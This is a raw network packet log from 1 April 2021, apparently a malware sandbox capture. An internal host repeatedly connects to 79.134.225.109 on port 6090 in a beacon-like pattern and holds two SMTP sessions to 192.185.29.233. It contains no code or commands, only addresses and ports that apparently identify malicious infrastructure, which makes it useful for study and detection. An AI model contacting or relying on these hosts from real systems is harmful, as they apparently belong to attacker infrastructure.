Apr 1, 2021 17:44:47.318043947 CEST	49826	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:47.423641920 CEST	6090	49826	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:47.538337946 CEST	49827	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:47.645723104 CEST	6090	49827	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:48.154032946 CEST	49827	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:48.262898922 CEST	6090	49827	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:48.771094084 CEST	49827	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:48.878420115 CEST	6090	49827	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:48.993190050 CEST	49828	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:49.100435019 CEST	6090	49828	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:49.614954948 CEST	49828	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:49.721098900 CEST	6090	49828	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:50.224581003 CEST	49828	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:50.330394030 CEST	6090	49828	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:50.444853067 CEST	49829	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:50.553220034 CEST	6090	49829	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:51.068267107 CEST	49829	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:51.178643942 CEST	6090	49829	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:51.693351030 CEST	49829	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:51.803244114 CEST	6090	49829	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:51.914458990 CEST	49830	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:52.019961119 CEST	6090	49830	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:52.537126064 CEST	49830	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:52.642651081 CEST	6090	49830	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:53.146653891 CEST	49830	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:53.251792908 CEST	6090	49830	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:53.367702961 CEST	49831	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:53.473186016 CEST	6090	49831	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:53.975590944 CEST	49831	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:54.084510088 CEST	6090	49831	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:54.599862099 CEST	49831	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:54.705039024 CEST	6090	49831	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:54.820312977 CEST	49832	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:54.929516077 CEST	6090	49832	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:55.443562031 CEST	49832	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:55.549225092 CEST	6090	49832	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:56.053113937 CEST	49832	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:56.161014080 CEST	6090	49832	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:56.275404930 CEST	49833	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:56.380389929 CEST	6090	49833	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:56.881968975 CEST	49833	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:56.989525080 CEST	6090	49833	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:57.490814924 CEST	49833	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:57.596842051 CEST	6090	49833	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:57.711781025 CEST	49834	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:57.817325115 CEST	6090	49834	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:58.319848061 CEST	49834	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:58.425573111 CEST	6090	49834	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:58.928261995 CEST	49834	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:59.036737919 CEST	6090	49834	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:59.151313066 CEST	49835	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:59.258414030 CEST	6090	49835	79.134.225.109	192.168.2.3
Apr 1, 2021 17:44:59.772186995 CEST	49835	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:44:59.880331993 CEST	6090	49835	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:00.382167101 CEST	49835	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:00.487997055 CEST	6090	49835	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:00.604279041 CEST	49836	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:00.710825920 CEST	6090	49836	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:01.225366116 CEST	49836	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:01.333456039 CEST	6090	49836	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:01.834779978 CEST	49836	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:01.941004992 CEST	6090	49836	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:02.056356907 CEST	49837	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:02.162235022 CEST	6090	49837	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:02.663053989 CEST	49837	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:02.771411896 CEST	6090	49837	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:03.272407055 CEST	49837	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:03.378032923 CEST	6090	49837	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:03.494858027 CEST	49838	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:03.600877047 CEST	6090	49838	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:04.116257906 CEST	49838	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:04.221950054 CEST	6090	49838	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:04.725574017 CEST	49838	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:04.831552982 CEST	6090	49838	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:04.945640087 CEST	49839	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:05.051477909 CEST	6090	49839	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:05.553881884 CEST	49839	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:05.659899950 CEST	6090	49839	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:06.163233995 CEST	49839	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:06.268703938 CEST	6090	49839	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:06.383791924 CEST	49840	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:06.489721060 CEST	6090	49840	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:06.992324114 CEST	49840	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:07.097831964 CEST	6090	49840	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:07.600956917 CEST	49840	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:07.706423998 CEST	6090	49840	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:07.821521997 CEST	49841	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:07.931840897 CEST	6090	49841	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:08.444711924 CEST	49841	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:08.553308010 CEST	6090	49841	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:09.069772005 CEST	49841	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:09.178117037 CEST	6090	49841	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:09.292079926 CEST	49842	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:09.399791002 CEST	6090	49842	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:09.913616896 CEST	49842	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:10.022375107 CEST	6090	49842	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:10.522944927 CEST	49842	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:10.631746054 CEST	6090	49842	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:10.744020939 CEST	49843	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:10.853760958 CEST	6090	49843	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:11.366782904 CEST	49843	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:11.472685099 CEST	6090	49843	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:11.976433039 CEST	49843	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:12.081768990 CEST	6090	49843	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:12.197418928 CEST	49844	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:12.303381920 CEST	6090	49844	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:12.804982901 CEST	49844	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:12.910691977 CEST	6090	49844	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:13.414269924 CEST	49844	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:13.520107031 CEST	6090	49844	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:13.634210110 CEST	49845	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:13.741265059 CEST	6090	49845	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:14.242057085 CEST	49845	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:14.349431992 CEST	6090	49845	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:14.852216005 CEST	49845	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:14.960237980 CEST	6090	49845	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:15.072400093 CEST	49846	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:15.180160999 CEST	6090	49846	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:15.695360899 CEST	49846	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:15.804264069 CEST	6090	49846	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:16.304845095 CEST	49846	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:16.413515091 CEST	6090	49846	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:16.526041031 CEST	49847	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:16.634655952 CEST	6090	49847	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:17.148488045 CEST	49847	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:17.254323959 CEST	6090	49847	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:17.758781910 CEST	49847	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:17.864401102 CEST	6090	49847	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:17.980015039 CEST	49848	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:18.085377932 CEST	6090	49848	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:18.586308956 CEST	49848	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:18.692222118 CEST	6090	49848	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:19.195951939 CEST	49848	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:19.304234028 CEST	6090	49848	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:19.416901112 CEST	49849	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:19.527163982 CEST	6090	49849	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:20.039345026 CEST	49849	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:20.149991989 CEST	6090	49849	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:20.664474964 CEST	49849	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:20.772551060 CEST	6090	49849	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:20.884912968 CEST	49850	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:20.993403912 CEST	6090	49850	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:21.508202076 CEST	49850	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:21.615988016 CEST	6090	49850	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:22.117677927 CEST	49850	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:22.228732109 CEST	6090	49850	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:22.338227034 CEST	49851	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:22.452766895 CEST	6090	49851	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:22.964688063 CEST	49851	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:23.075155020 CEST	6090	49851	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:23.586520910 CEST	49851	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:23.695153952 CEST	6090	49851	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:23.807549953 CEST	49852	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:23.918123007 CEST	6090	49852	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:24.430427074 CEST	49852	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:24.541739941 CEST	6090	49852	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:25.055392981 CEST	49852	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:25.164771080 CEST	6090	49852	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:25.277244091 CEST	49853	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:25.383352995 CEST	6090	49853	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:25.899219990 CEST	49853	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:26.004868984 CEST	6090	49853	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:26.508654118 CEST	49853	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:26.614548922 CEST	6090	49853	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:26.729626894 CEST	49854	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:26.836339951 CEST	6090	49854	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:27.338165998 CEST	49854	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:27.444930077 CEST	6090	49854	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:27.879632950 CEST	49855	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:27.946327925 CEST	49854	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:28.041766882 CEST	587	49855	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:28.042058945 CEST	49855	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:28.053270102 CEST	6090	49854	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:28.167479992 CEST	49856	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:28.275999069 CEST	6090	49856	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:28.416682005 CEST	587	49855	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:28.420073032 CEST	49855	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:28.580080032 CEST	587	49855	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:28.580595016 CEST	49855	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:28.745837927 CEST	587	49855	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:28.753871918 CEST	49855	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:28.790261030 CEST	49856	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:28.898179054 CEST	6090	49856	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:28.935924053 CEST	587	49855	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:28.935977936 CEST	587	49855	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:28.936002016 CEST	587	49855	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:28.936181068 CEST	49855	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:28.945070982 CEST	49855	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:29.105285883 CEST	587	49855	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:29.141006947 CEST	49855	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:29.300899029 CEST	587	49855	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:29.306411982 CEST	49855	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:29.399571896 CEST	49856	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:29.468446970 CEST	587	49855	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:29.469444036 CEST	49855	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:29.505570889 CEST	6090	49856	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:29.621232033 CEST	49857	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:29.632944107 CEST	587	49855	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:29.634294987 CEST	49855	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:29.727492094 CEST	6090	49857	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:29.794336081 CEST	587	49855	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:29.805625916 CEST	49855	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:29.975744009 CEST	587	49855	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:29.976280928 CEST	49855	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:30.135817051 CEST	587	49855	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:30.139461040 CEST	49855	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:30.139714956 CEST	49855	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:30.140513897 CEST	49855	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:30.140691042 CEST	49855	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:30.227752924 CEST	49857	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:30.301296949 CEST	587	49855	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:30.301595926 CEST	587	49855	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:30.301619053 CEST	587	49855	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:30.301635981 CEST	587	49855	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:30.302930117 CEST	587	49855	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:30.333508015 CEST	6090	49857	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:30.352737904 CEST	49855	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:30.837199926 CEST	49857	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:30.945540905 CEST	6090	49857	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:31.058697939 CEST	49858	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:31.164282084 CEST	6090	49858	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:31.299468040 CEST	49855	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:31.459726095 CEST	587	49855	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:31.459935904 CEST	49855	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:31.460839033 CEST	49855	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:31.462547064 CEST	49859	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:31.621211052 CEST	587	49859	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:31.621359110 CEST	49859	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:31.665404081 CEST	49858	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:31.774403095 CEST	6090	49858	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:31.783608913 CEST	587	49859	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:31.783962965 CEST	49859	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:31.939624071 CEST	587	49859	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:31.940222025 CEST	49859	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:32.099847078 CEST	587	49859	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:32.100656986 CEST	49859	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:32.271265030 CEST	587	49859	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:32.271291018 CEST	587	49859	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:32.271301031 CEST	587	49859	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:32.271500111 CEST	49859	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:32.274792910 CEST	49858	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:32.275542021 CEST	49859	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:32.385627031 CEST	6090	49858	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:32.437633991 CEST	587	49859	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:32.440135956 CEST	49859	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:32.495546103 CEST	49860	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:32.595773935 CEST	587	49859	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:32.596308947 CEST	49859	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:32.605639935 CEST	6090	49860	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:32.752249956 CEST	587	49859	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:32.753195047 CEST	49859	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:32.913664103 CEST	587	49859	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:32.914288998 CEST	49859	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:33.071826935 CEST	587	49859	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:33.072415113 CEST	49859	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:33.118591070 CEST	49860	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:33.223659992 CEST	6090	49860	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:33.234296083 CEST	587	49859	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:33.234898090 CEST	49859	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:33.391256094 CEST	587	49859	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:33.393141031 CEST	49859	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:33.393414021 CEST	49859	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:33.393583059 CEST	49859	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:33.393755913 CEST	49859	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:33.394023895 CEST	49859	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:33.394231081 CEST	49859	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:33.394355059 CEST	49859	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:33.394484043 CEST	49859	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:33.548609972 CEST	587	49859	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:33.548645020 CEST	587	49859	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:33.548882008 CEST	587	49859	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:33.548989058 CEST	587	49859	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:33.549283981 CEST	587	49859	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:33.549401045 CEST	587	49859	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:33.549500942 CEST	587	49859	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:33.549629927 CEST	587	49859	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:33.550084114 CEST	587	49859	192.185.29.233	192.168.2.3
Apr 1, 2021 17:45:33.603065968 CEST	49859	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:45:33.728198051 CEST	49860	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:33.834748030 CEST	6090	49860	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:33.948729038 CEST	49861	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:34.060971022 CEST	6090	49861	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:34.571938038 CEST	49861	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:34.680022955 CEST	6090	49861	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:35.181337118 CEST	49861	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:35.289099932 CEST	6090	49861	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:35.401825905 CEST	49862	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:35.508301020 CEST	6090	49862	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:36.009485006 CEST	49862	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:36.115216970 CEST	6090	49862	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:36.618946075 CEST	49862	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:36.723869085 CEST	6090	49862	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:36.839374065 CEST	49863	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:36.949771881 CEST	6090	49863	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:37.462809086 CEST	49863	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:37.572679043 CEST	6090	49863	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:38.087869883 CEST	49863	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:38.196122885 CEST	6090	49863	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:38.309159994 CEST	49864	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:38.415229082 CEST	6090	49864	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:38.915966988 CEST	49864	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:39.024208069 CEST	6090	49864	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:39.525454044 CEST	49864	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:39.633577108 CEST	6090	49864	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:39.746766090 CEST	49865	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:39.852103949 CEST	6090	49865	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:40.353655100 CEST	49865	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:40.459608078 CEST	6090	49865	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:40.963238001 CEST	49865	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:41.069164991 CEST	6090	49865	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:41.185375929 CEST	49866	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:41.290415049 CEST	6090	49866	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:41.791358948 CEST	49866	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:41.898483992 CEST	6090	49866	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:42.400649071 CEST	49866	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:42.509664059 CEST	6090	49866	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:42.621519089 CEST	49867	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:42.729537010 CEST	6090	49867	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:43.244477034 CEST	49867	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:43.349351883 CEST	6090	49867	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:43.853899956 CEST	49867	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:43.959269047 CEST	6090	49867	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:44.074594975 CEST	49868	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:44.182951927 CEST	6090	49868	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:44.697676897 CEST	49868	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:44.804402113 CEST	6090	49868	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:45.307173014 CEST	49868	6090	192.168.2.3	79.134.225.109
